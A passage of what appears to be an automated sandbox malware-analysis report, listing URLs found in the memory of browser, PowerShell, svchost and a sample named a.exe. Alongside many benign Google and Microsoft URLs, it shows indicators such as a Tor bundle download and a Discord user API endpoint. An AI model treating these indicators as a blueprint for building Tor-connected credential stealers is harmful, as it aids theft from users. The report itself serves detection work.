                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                      Source: chrome.exe, 0000000C.00000002.1518136270.00003D3C00096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                      Source: chrome.exe, 0000000C.00000002.1532602280.00003D3C01AE4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                      Source: chrome.exe, 0000000C.00000002.1529659679.00003D3C016D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1508044068.0000021F24437000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1513482076.0000021F27775000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                      Source: chrome.exe, 0000000C.00000002.1522099250.00003D3C008D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
                      Source: chrome.exe, 0000000C.00000003.1423818620.00003D3C014C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1423946714.00003D3C014D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1424062885.00003D3C004B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1394323838.00003D3C014F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525069779.00003D3C00C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                      Source: chrome.exe, 0000000C.00000002.1527164269.00003D3C01100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                      Source: chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: chrome.exe, 0000000C.00000002.1521991341.00003D3C00894000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                      Source: chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                      Source: chrome.exe, 0000000C.00000002.1527164269.00003D3C01100000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: chrome.exe, 0000000C.00000002.1527662934.00003D3C011C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521902815.00003D3C00864000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521738882.00003D3C00814000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chrome.google.com/webstore/category/extensions
                      Source: chrome.exe, 0000000C.00000002.1527164269.00003D3C01100000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530061612.00003D3C017F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GB
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GB&category=theme81https://myactivity.google.com/myactivity
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GBCtrl$1
                      Source: chrome.exe, 0000000C.00000002.1522542023.00003D3C00981000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GBWeb
                      Source: chrome.exe, 0000000C.00000002.1526959026.00003D3C01081000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1424326024.00003D3C011B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1395667479.00003D3C011C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1424521178.00003D3C011C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1527662934.00003D3C011C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                      Source: chrome.exe, 0000000C.00000002.1521192143.00003D3C006A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
                      Source: chrome.exe, 0000000C.00000002.1521192143.00003D3C006A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                      Source: chrome.exe, 0000000C.00000002.1518621958.00003D3C00170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: chrome.exe, 0000000C.00000002.1522167235.00003D3C008F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
                      Source: chrome.exe, 0000000C.00000002.1522167235.00003D3C008F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                      Source: chrome.exe, 0000000D.00000000.1383267169.00007FFC9D18F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                      Source: chrome.exe, 0000000D.00000002.1485443743.0000020D44514000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000000.1379777633.000039F00002C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1485443743.0000020D4458A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report--annotation=channel=--annotation=plat=Win64--annotation=prod=C
                      Source: chrome.exe, 0000000D.00000000.1381224247.000071100008C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report--initial-client-data=0x108
                      Source: chrome.exe, 0000000D.00000002.1492273570.000071100007C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000D.00000000.1381126333.000071100007C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/reporthttps://clients2.google.com/cr/report0
                      Source: chrome.exe, 0000000D.00000002.1492273570.000071100007C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000D.00000000.1381126333.000071100007C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/reportr
                      Source: chrome.exe, 0000000C.00000002.1526280757.00003D3C00F1C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1527164269.00003D3C01100000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1518621958.00003D3C00170000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521991341.00003D3C00894000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1526370838.00003D3C00F54000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1519213170.00003D3C002DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: chrome.exe, 0000000C.00000002.1519339651.00003D3C00304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.googleusercontent.com/crx/blobs/Ad_brx0SWGOSGqFl0dtZghwwCPrDWZ3EBf4bTFepBKfbm0QixON
                      Source: chrome.exe, 0000000C.00000002.1519339651.00003D3C00304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.googleusercontent.com/crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                      Source: chrome.exe, 0000000C.00000002.1521442004.00003D3C00750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                      Source: chrome.exe, 0000000C.00000002.1521442004.00003D3C00750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                      Source: chrome.exe, 0000000C.00000002.1521615709.00003D3C007C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
                      Source: powershell.exe, 00000001.00000002.1173728731.0000000005788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000001.00000002.1173728731.0000000005788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000001.00000002.1173728731.0000000005788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: chrome.exe, 0000000C.00000002.1518930379.00003D3C001D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                      Source: chrome.exe, 0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                      Source: chrome.exe, 0000000C.00000002.1529178362.00003D3C01534000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
                      Source: chrome.exe, 0000000C.00000002.1527232245.00003D3C01148000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1532032472.00003D3C01A70000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                      Source: chrome.exe, 0000000C.00000002.1527232245.00003D3C01148000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default7
                      Source: chrome.exe, 0000000C.00000002.1532032472.00003D3C01A70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultdler
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525069779.00003D3C00C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525069779.00003D3C00C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                      Source: chrome.exe, 0000000C.00000002.1532032472.00003D3C01A70000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappme_default
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapprageHandler
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappsageHandler
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                      Source: chrome.exe, 0000000C.00000002.1527232245.00003D3C01148000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525069779.00003D3C00C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                      Source: chrome.exe, 0000000C.00000002.1528857420.00003D3C0142C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                      Source: chrome.exe, 0000000C.00000002.1532032472.00003D3C01A70000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528857420.00003D3C0142C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webappHandler
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webappHandlerler
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webappme_default
                      Source: chrome.exe, 0000000C.00000002.1528857420.00003D3C0142C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525069779.00003D3C00C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                      Source: chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/lfhs=2
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521991341.00003D3C00894000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                      Source: chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: chrome.exe, 0000000C.00000002.1521991341.00003D3C00894000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv10
                      Source: chrome.exe, 0000000C.00000002.1521991341.00003D3C00894000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                      Source: chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: chrome.exe, 0000000C.00000003.1395267898.00003D3C01654000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1394771457.00003D3C0162C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1395421828.00003D3C01584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.google.com/icons?selected=Material
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: chrome.exe, 0000000C.00000002.1518749749.00003D3C001B6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: chrome.exe, 0000000C.00000002.1525459772.00003D3C00D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=searchTerms
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic/intro?20
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic2
                      Source: a.exe, 0000000B.00000002.1787672422.0000000003583000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003598000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003546000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000356E000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000355A000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000358D000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003575000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000354C000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Azure/azure-storage-cpp)
